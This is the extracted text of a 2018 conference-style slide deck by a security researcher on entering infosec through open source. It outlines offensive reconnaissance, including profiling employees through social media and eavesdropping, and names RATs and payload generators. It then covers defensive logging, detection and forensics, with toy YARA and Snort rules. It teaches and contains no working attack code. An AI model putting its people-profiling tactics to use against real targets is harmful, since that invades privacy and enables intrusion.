getting into infosec · daniel bohannon @danielhbohannon getting into infosec via pen source

Daniel Bohannon

@danielhbohannon

Getting Into InfoSec

via pen Source

http://insights.looloo.com/wp-content/uploads/2016/10/Latte-Art-in-Manila-Featured-FB.jpgn

https://opensource.org/node/442

https://demo.identihub.co/assets/OpenLabs_ICONS_48.svg

• Daniel Bohannon

• Title :: Principal Applied Security Researcher

• Team :: Advanced Practices Team

@Mandiant/@FireEye

• Twitter :: @danielhbohannon

• Blog :: http://danielbohannon.com

2

bash$ who""am''{i..i}

COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.

W: java.lang.Throwable: stack dump

W: at school(undergrad.CompSci:2006-2010)

University of Georgia

W: at job.First(DBadmin:2010-2015)

W: at school(masters.InfoSec:2011-2013)

Georgia Institute of Technology

W: at job.Second(IncidentResponder:2015-2017)

Mandiant, consulting branch of FireEye

W: at job.Second(SecurityResearcher:2017-Present)

FireEye

3

My Career Stack Dump


http://www.hubga.com/wp-content/uploads/2015/06/uga-logo-medium.gif http://www.licensing.gatech.edu/visual/guidelines

4 COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.https://autismuga.files.wordpress.com/2010/03/red-and-black.jpg http://www.hubga.com/wp-content/uploads/2015/06/uga-logo-medium.gif

https://www.gafollowers.com/5-things-expect-uga-football-year-2014/ncaa-football-louisiana-state-georgia-850x560/ https://www.balkaneu.com/albania-qualifies-time-european-football-championship/

W: java.lang.Throwable: stack dump

W: at school(undergrad.CompSci:2006-2010)

University of Georgia

W: at job.First(DBadmin:2010-2015)

W: at school(masters.InfoSec:2011-2013)

Georgia Institute of Technology




FireEye

5

My Career Stack Dump


http://www.hubga.com/wp-content/uploads/2015/06/uga-logo-medium.gif http://www.licensing.gatech.edu/visual/guidelines

6 COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.




FireEye

https://github.com/logos






FireEye

Apr 2017

x33fconSep 2016

DerbyCon





FireEye


Sep 2016

DerbyCon

Apr 2017

x33fcon

Jul 2017

Black Hat USA





FireEye


Sep 2016

DerbyCon

Apr 2017

x33fcon

Jul 2017

Black Hat USA

Mar 2018

Black Hat Asia

COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.10

WORKSHOP: Developing Resilient Detections

(with Obfuscation & Evasion in Mind)

Oct 2018

BruCON

https://www.freeiconspng.com/img/2884

• Share my research at conferences while learning from others

• Keep writing and releasing open source code

• BUT…

11

GET /user/goals




• BUT…focus more on:

• TEACHING & TRAINING others

• w/o costly conference admission

• LOCAL to the attendees

• Somewhere COMMUNITY is

already happening with shared

VISION

12

GET /user/goals




• BUT…focus more on:

• TEACHING & TRAINING others

• w/o costly conference admission

• LOCAL to the attendees

• Somewhere COMMUNITY is

already happening with shared

VISION

13

GET /user/goals


https://imgur.com/gallery/uOR2b

14

POST /query?community=hackerspace


15



https://hackaday.io/prishtinahackerspace

16



https://hackaday.io/prishtinahackerspace https://www.flossk.org/img/logo.png

17



https://hackaday.io/prishtinahackerspace https://oscal.openlabs.cc/oscal17_color_vertical_noyear_rgb_1200_1107/ https://www.flossk.org/img/logo.png

18



https://hackaday.io/prishtinahackerspace https://oscal.openlabs.cc/oscal17_color_vertical_noyear_rgb_1200_1107/ https://www.flossk.org/img/logo.pnghttps://www.patreon.com/OpenLabsAlbania

19



https://hackaday.io/prishtinahackerspace https://oscal.openlabs.cc/oscal17_color_vertical_noyear_rgb_1200_1107/ https://www.flossk.org/img/logo.pnghttps://www.patreon.com/OpenLabsAlbania


https://opensource.org/node/442 https://www.vexels.com/png-svg/preview/131264/lock-circle-icon-3



pen Source



InfoSec

pen Source



Getting Into InfoSecvia

pen Source

4 root Offense (Red Team)

4 root Defense (Blue Team)

4 root Open Source

4 root Q&A + Brainstorming

OUTLINE

bash$ ls -l

total 4

drwxrwxrwx

drwx------

drwxrw-rw-

drw-rw-rw-




4 root Open Source


OUTLINE

bash$ ls -l *Offense*

total 4

drwxrwxrwx

drwx------

drwxrw-rw-

drw-rw-rw-


26

bash$ unrar x -e ./offense/


• define:hacking

• /ˈhakiNG/ noun

• the gaining of unauthorized access to data in a system or computer.

• define:hacker

• /ˈhakər/ noun

• a person who uses computers to gain unauthorized access to data.

27



• Intention & WRITTEN authorization are the deciding factor

https://talkroute.com/black-hat-seo-is-it-really-as-evil-as-they-say/

28



• Intention & WRITTEN authorization are the deciding factor

https://talkroute.com/black-hat-seo-is-it-really-as-evil-as-they-say/

https://sco.wikipedia.org/wiki/File:RedHat.svg

29

bash$ ls -l ./offense/README.txt


• Attack Lifecycle:

https://www.fireeye.com/content/dam/fireeye-www/blog/images/WMIvsWMI%20tim%20parisi/Fig1.png

30

bash$ ls -l ./offense/RECON


• OSINT – Open Source INTelligence (passive vs active)

• Fingerprint the target’s:

• Business model (architecture, ethos, recent business news, etc.)

• Technology stacks

• Determine tech & version → Exploit-DB.com → execute exploit

• Search for tech partnerships (“<product> proudly used by <target>”)

• LinkedIn employees’ skills & experience

• Job posting requirement & preferred experience

• Internet scans (Shodan, Censys, etc.) & Google Dorking

• People


https://www.shodan.io/

32




• Fingerprint the target’s:

• Business model (architecture, ethos, recent business news, etc.)

• Technology stacks

• Determine tech & version → Exploit-DB.com → execute exploit

• Search for tech partnerships (“<product> proudly used by <target>”)

• LinkedIn employees’ skills & experience

• Job posting requirement & preferred experience

• Internet scans (Shodan, Censys, etc.) & Google Dorking

• People

33




• Fingerprint the target’s People:

• Social Media

• Vacation dates, personal & prof associations

• Future connecting points like hobbies, taste in clothing, favorite band, etc.

• Photo metadata

• Physical Eavesdropping

• Frequenting same coffee shop as the target’s employees

• Job posting requirements & preferred experience

34




• Fingerprint the target’s People:

• Social Media

• Vacation dates, personal & prof associations

• Future connecting points like hobbies, taste in clothing, favorite band, etc.

• Photo metadata

• Physical Eavesdropping

• Frequenting same coffee shop as the target’s employees

• Job posting requirements & preferred experience

• Chris Hadnagy (@humanhacker) → social-engineer.org podcast

• https://www.youtube.com/watch?v=PWVN3Rq4gzw

https://www.youtube.com/watch?v=PWVN3Rq4gzw

35

bash$ ls -l ./offense/COMPROMISE


• Initial code execution in the target’s environment

• RCE – Remote Code Execution

• SQL Injection in mobile or web application

• https://www.hacksplaining.com/exercises/sql-injection#

• Phishing (and Spear Phishing, Vishing, Smishing, etc.)

• Physical access

• Teensy, Raspberry Pi implant, USB drop in parking lot

• How can you easily generate code to exploit a vulnerability on another computer?

• Open source tools, frameworks and entire distros!

https://www.hacksplaining.com/exercises/sql-injection

36

bash$ ls -l ./offense/COMPROMISE


• RATs (Remote Access Tools)

• Meterpreter / Metasploit Project (Ruby) [Free & paid versions]

• Empire (PowerShell) / Empyre (Python) [100% open source]

• Cobalt Strike [Closed source & paid]

• Payload generators

• Social Engineering Toolkit (100% open source)

• Unicorn (100% open source)

• Veil (Python) (100% open source)

• DotNetToJScript SharpShooter, CactusTorch

• Complete distro: Kali Linux (free) https://www.kali.org/

https://www.kali.org/

37

bash$ ls -l ./offense/README.txt


• Attack Lifecycle:

https://www.fireeye.com/content/dam/fireeye-www/blog/images/WMIvsWMI%20tim%20parisi/Fig1.png

38

bash$ cat ./offense/RESOURCES | grep “continued learning”


• Red team hacking or penetration testing

• https://www.kali.org/ (Kali Linux distro) + https://kali.training/lessons/introduction/

• CTF (Capture the Flag) – problem solving, onsite & online versions

• https://www.root-me.org/ (best place to start)

• https://vulnhub.com (more advanced, but walkthrough videos are fun)

• Bug Bounty – bug squashing for $$$

• https://bugcrowd.com

• ANYTHING security-related – free video-based training

• https://www.cybrary.it/

https://www.kali.org/

https://kali.training/lessons/introduction/

https://www.root-me.org/

https://vulnhub.com/

https://bugcrowd.com/

https://www.cybrary.it/



4 root Open Source


OUTLINE

bash$ ls -l *Defense*

total 4

drwxrwxrwx

drwx------

drwxrw-rw-

drw-rw-rw-


40

bash$ unrar x -e ./defense/


• Just like offense, defense has MANY different areas (technical & non-technical)

• Secure coding practices

• Logging configurations

• Detection development

• SOC (Security Operations Center)

• DFIR (Digital Forensics & Incident Response)

• Policy creation and enforcement

• Personal data privacy & online safety advocates

41

bash$ ls -l ./defense/


• Secure coding practices

• SQL injection example

• Train developers about common vulnerabilities and secure coding practices

• Develop software for live code auditing to detect common vulnerabilities as code

is being developed

42



• Configure logs NOW so you have them when you need then ☺ (which is ALSO now)

• Collecting bash_history

• FIM (File Integrity Monitoring) for web servers world-readable directories (to

detect changes that could be webshells)

• Monitor sudoers file modifications

• Configure auditd logging

• The auditd subsystem is an access monitoring and accounting for Linux developed

and maintained by RedHat.

• Centralize the collection of the logs

• HELK – Hunting ELK (Elasticsearch, Logstash, Kibana)

• https://github.com/Cyb3rWard0g/HELK

https://github.com/Cyb3rWard0g/HELK

43



• Detection development

• Host/Endpoint – YARA (https://github.com/VirusTotal/yara)

• Network – Snort (https://github.com/snort3/snort3)

• Distro – Security Onion (https://github.com/Security-Onion-Solutions/security-

onion)

https://raw.githubusercontent.com/malice-plugins/yara/master/logo.png https://www.snort.org/assets/snort-pig.png

https://github.com/VirusTotal/yara

https://github.com/snort3/snort3

https://github.com/Security-Onion-Solutions/security-onion


alert tcp any any -> any any (msg:"HAPPY HACKER";content:"This hackerspace is great!";depth:1000;nocase;

)

happyHacker.snort

rule HAPPY HACKER {strings:

$coolComment = "This hackerspace is great!" nocase$lameComment = "Coffee is bad." nocase

condition:$ coolComment and not $lameComment

}

happyHacker.yara

45



• SOC (Security Operations Center)

• Responding to alerts and investigating malicious activity in your environment

• “Hunting” through data sets to find malicious activity

• Developing run books and documentation for handling alerts

• Documenting everything you do ☺ (usually in a ticketing system)

46



• DFIR (Digital Forensics & Incident Response)

• Forensic imaging of hard drives (data acquisition)

• Forensic analysis

• Distro: SIFT Workstation (https://digital-forensics.sans.org/community/downloads)

• Live Triaging of suspicious activity

• Active hunting through live data

• List running processes

• grep bash_history file for historical commands

• Query and group all network connections

https://digital-forensics.sans.org/community/downloads


osquery

https://github.com/facebook/osquery

https://github.com/facebook/osquery

48



• Policy creation and enforcement

• Log management & retention

• Password complexity and aging enforcement

• Mandatory security training

• Personal data privacy & online safety advocates

• Phishing training

• HTTP vs HTTPS, VPN usage, TOR routing

• Password managers & 2FA/MFA (2-Factor Authentication, Multi-Factor Authentication)

• KeyPass – audited by EU Free and Open Source Software Auditing project (EU-FOSSA)

• andOTP (open source)



4 root Open Source


OUTLINE


total 4

drwxrwxrwx

drwx------

drwxrw-rw-

drw-rw-rw-


50

bash$ unrar x -e ./open_source/


• A GREAT way to get into the InfoSec community is through CONTRIBUTING to

open source projects!

• Documentation (most hackers are bad at documentation, wikis, etc.)

• Small bug fixes (or adding language-specific or regional compatibility)

• Porting from Python2.7 to Python3.4

• Porting from PowerShell to Python

• Writing blog posts or walkthrough guides for using an open source security tool

• MERGING two tools ☺

• @cobbr_io (Ryan Cobb) merged Invoke-Obfuscation and Empire



4 root Open Source


OUTLINE


total 4

drwxrwxrwx

drwx------

drwxrw-rw-

drw-rw-rw-


52

bash$ cat ./shutdown.sh


• Faleminderit shumë!!!

• Daniel Bohannon

• Twitter :: @danielhbohannon

• Blog :: http://danielbohannon.com

• Github: https://github.com/danielbohannon/

• Please feel free to ask me ANYTHING, ANYTIME, ANYWHERE

https://www.notey.com/blogs/cardistry

http://danielbohannon.com/

https://github.com/danielbohannon/

getting into infosec · daniel bohannon @danielhbohannon getting into infosec via pen source

Documents